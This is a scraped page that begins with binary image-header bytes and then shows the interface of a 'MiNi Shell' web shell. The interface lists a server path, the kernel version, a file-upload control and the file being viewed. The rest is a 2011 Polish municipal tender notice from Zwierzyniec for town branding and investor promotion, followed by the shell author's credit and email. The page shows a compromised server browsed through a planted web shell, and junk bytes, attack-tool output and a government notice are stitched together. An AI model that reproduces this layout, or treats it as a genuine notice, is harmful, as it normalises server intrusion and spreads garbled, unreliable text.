JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110203/40335-N-2011.html

<p class="kh_header"><b>Zwierzyniec: Budowa marki Zwierzyniec kluczem do szybszego rozwoju społeczno - gospodarczego gminy i regionu.</b><br>
<b>Numer ogłoszenia: 40335 - 2011; data zamieszczenia: 03.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zwierzyniec , Rynek 1, 22-470 Zwierzyniec, woj. lubelskie, tel. 084 6872011 w. 37, faks 084 6872011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwierzyniec.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa marki Zwierzyniec kluczem do szybszego rozwoju społeczno - gospodarczego gminy i regionu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przeprowadzenie badań B2B wśród potencjalnych inwestorów z całego kraju, które ukażą oczekiwania i profil potencjalnych inwestorów (w kontekście przyjętych wcześniej założeń markowych) oraz pozwolą stworzyć jak najlepszą ofertę inwestycyjną miasta - Zamawiający pozostawia Wykonawcy wybór technik i metod badawczych niezbędnych do osiągnięcia celów badania, ale zakłada się, że na różnych jego etapach badanie będzie wykorzystywało co najmniej  :
a) techniki ilościowe (na próbie co najmniej 200 respondentów)
b) techniki jakościowe (co najmniej 15 wywiadów)
2. Przeprowadzenie audytu zasobów biznesowych, który pozwoli dokładnie określić wartość i siłę oddziaływania posiadanych obecnie zasobów gospodarczych, określić główne bariery i problemy związane z rozwojem inwestycji oraz wykreować nowe zasoby. Wynikiem przeprowadzonego audytu ma być raport określający walory Zwierzyńca w kontekście założeń markowych, które należy szczególnie komunikować inwestorom. Na audyt powinny złożyć się co najmniej :
a) weryfikacja infrastruktury, procesów i polityki samorządowej;
b) ocena możliwości gospodarczych gminy - minimum 10 wywiadów;
c) określenie barier gospodarczych - minimum 2 warsztaty;
d) zaprojektowanie nowych rozwiązań rozwojowych - warsztat kreatywny;
e) konsultacje nowych rozwiązań - minimum 3 spotkania konsultacyjne;
f) raport końcowy.  
3. Opracowanie planu działań promocyjnych skierowanych do biznesu, który określi konkretne działania promocyjne wspomagające wdrożenie marki w segmencie biznesowym oraz przyciąganie inwestycji. Jednocześnie, jako załącznik do planu, zostanie opracowana lista mediów, za pomocą których marka będzie komunikowana w segmencie B2B. Podstawowe elementy opracowania planu to:
a) określenie celów promocyjnych - minimum jeden warsztat,
b) wielokryteriowa segmentacja makrosegmentu biznesowego, 
c) określenie głównych narzędzi promocyjnych,
d) zaprojektowanie głównych działań promocyjnych do poszczególnych segmentów wraz z harmonogramem, wstępnym budżetem oraz zaleceniami wdrożeniowymi,
e) prezentacja i konsultacja rozwiązań - minimum dwa spotkania robocze,
f) opracowanie finalnego projektu,
g) określenie listy mediów.
4. Stworzenie systemu obsługi inwestora na bazie serwisu internetowego skierowanego do przedsiębiorców i inwestorów. Będzie on zawierał oferty inwestycyjne przygotowywane przez Gminę, jak również będzie przekazywał informacje na temat samej marki Zwierzyniec i regionu oraz przygotowane materiały informacyjno-promocyjne. Wykonawca powinien przygotować serwis, spełniający co najmniej poniższe wymagania:
- serwis będzie się opierał na systemie CMS;
- forma graficzna nowoczesna, minimalistyczna, stawiająca na eksponowanie treści dla potencjalnych odbiorców;
- całość zarządzana będzie poprzez panel administracyjny, pozwalający na kontrolę użytkowników, ich praw do przeglądania serwisu, tworzenia wpisów na forum oraz na pełne administrowanie moderatorami oraz redaktorami serwisu;
- forum moderowane przez uprawnionych do tego użytkowników, pozwalające na wymianę informacji i ściśle zintegrowane z całym serwisem - komentarze pod artykułami/ofertami;
- użytkownicy serwisu zostaną podzieleni na grupy w celu sprawniejszego kierowania do nich odpowiednich ofert inwestycyjnych;
- zintegrowany z serwisem newsletter, posiadający obsługę wszystkich grup jak również poszczególnych użytkowników serwisu.
5. Kampania promocyjna, na którą złożą się:
a) Organizacja jednodniowej konferencji dla 50 uczestników połączonej ze spotkaniem dla mediów, na której zostaną zaprezentowane efekty projektu oraz oferta Gminy skierowana do biznesu. Konferencja będzie skierowana przede wszystkim do przedsiębiorców, inwestorów i mediów biznesowych. Konferencja odbędzie się 
w wybranym miejscu w Zwierzyńcu (zaakceptowanym przez Zamawiającego), Wykonawca powinien zapewnić co najmniej:
- klimatyzowaną salę, (lokalizacja w Zwierzyńcu zaakceptowana przez Zamawiającego);
- ustalenie z Zamawiającym listy gości (o zasięgu ogólnopolskim) i wysłanie indywidualnie zaprojektowanych i wykonanych zaproszeń;
- 3 prelegentów oraz prowadzącego konferencję;
- wyżywienie: obiad (2 dania) + minimum 2 przerwy kawowe (kawa, herbata, woda, soki, ciastka w kilku odmianach);
- elementy techniczne: projektor multimedialny wraz z ekranem, nagłośnienie, laptop do prezentacji;
- materiały dla uczestników: długopisy, teczki (A4, 4+0), notatnik, foldery promocyjne, identyfikatory.
b) Opracowanie i wydruk (w ilości 2 000 szt.) folderu gospodarczego / inwestycyjnego, zawierającego elementy oferty Zwierzyńca i prezentującego jego atrakcyjność inwestycyjną. Folder ma być oparty na istniejących dokumentach strategicznych, planie działań promocyjnych oraz wynikach badań B2B. Folder powinien spełniać co najmniej poniższe wymagania:
- format minimum : 23 cm na 23 cm;
- objętość: minimum 16 stron;
- okładka: papier mat 250 g/m2, folia mat + lakier UV punktowo;
- środek: papier mat 170 g/m2;
- kolorystyka: 4+4;
- zszyty
c) Działania prasowe polegające na opracowaniu pakietu materiałów prasowych, które będą skierowane przede wszystkim do mediów biznesowych i obejmą co najmniej 10 informacji prasowych i 5 artykułów gotowych do publikacji oraz publikacji artykułu sponsorowanego w prasie ogólnopolskiej. Działania prasowe powinny objąć co najmniej następujące elementy:
- przygotowanie do publikacji co najmniej 10 informacji prasowych o wielkości do 1 strony maszynopisu (do 2500 znaków);
- przygotowanie do publikacji co najmniej 5 artykułów sponsorowanych o wielkości do 2 stron maszynopisu (do 5000 znaków);
- zamieszczenie artykułu sponsorowanego w biznesowym wydawnictwie ogólnopolskim o nakładzie minimum 20000 egzemplarzy - o wielkości minimum 164 mm x 90 mm.
Wszystkie materiały prasowe muszą być skonsultowane i zaakceptowane przez Zamawiającego.
Do oferty należy dołączyć konspekt koncepcji realizacji zamówienia, zawierający opis koncepcji, metod i narzędzi zmierzających do wykonania zamówienia (na jego podstawie odbędzie się ocena merytoryczna oferty)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.31.10.00-7, 79.31.12.00-9, 79.31.13.00-0, 79.21.22.00-3, 72.40.00.00-4, 72.00.00.00-5, 79.34.22.00-5, 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> -nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie :
a) przynajmniej 1 usługi, o wartości nie mniejszej niż 70 000,00 zł brutto, polegającej na opracowaniu dokumentu (strategii, programu lub planu) dotyczącego promocji dla jednostki samorządu terytorialnego, poprzedzone przeprowadzeniem badań marketingowych i analizą zasobów biznesowych/audytem gospodarczym;
b) przynajmniej 2 usług, o wartości nie mniejszej niż 50 000,00 zł brutto każda, polegających na przygotowaniu i przeprowadzeniu kampanii promocyjno-informacyjnej dla jednostki samorządu terytorialnego;
c) przynajmniej 2 usług polegających na przygotowaniu wielofunkcyjnego serwisu internetowego dla jednostki samorządu terytorialnego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeśli wykaże, że dysponuje co najmniej 5 osobami, które będą uczestniczyć w wykonaniu zamówienia posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania niniejszego zamówienia, w tym:
a) kierownikiem projektu - minimum pięcioletnie doświadczenie zawodowe, w tym kierowanie zespołem przy pracach nad przynajmniej 3 projektami związanymi z przygotowaniem dokumentów (strategii, programów, planów) dotyczących promocji lub komunikacji dla jednostki samorządu terytorialnego;
b) głównym analitykiem - minimum pięcioletnie doświadczenie zawodowe przy pracach analitycznych, w tym doświadczenie w pracy nad minimum 2 projektami obejmującymi badania ilościowe i jakościowe dla jednostki samorządu terytorialnego;
c) głównym grafikiem - minimum pięcioletnie doświadczenie zawodowe w pracach graficznych oraz doświadczenie w pracy nad co najmniej 1 projektem polegającym na przeprowadzeniu kampanii promocyjno-informacyjnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - jakość badań, diagnoz i analiz - 20</li>
<li>3 - jakość metodologii opracowania planu promocji - 30</li>
<li>4 - jakość narzędzi przygotowania systemu obsługi inwestora - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin zakończenia może ulec zmianie w przypadku :
- działania siły wyższej;
- wystąpienia okoliczności, których strony umowy nie mogły przewidzieć, pomimo zachowania należytej staranności.
W przedstawionych wyżej przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji. 
Cena podana w ofercie może ulec zmianie o wysokość należnego podatku VAT (jeżeli występuje), zgodnie z obowiązującymi przepisami w dniu wystawienia faktury przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwierzyniec.netbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zwierzyńcu, ul. Rynek 1, 22-470 Zwierzyniec..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 10:00, miejsce: Urząd Miejski w Zwierzyńcu, ul. Rynek 1, 22-470 Zwierzyniec, Pokój nr 6, I-sze piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com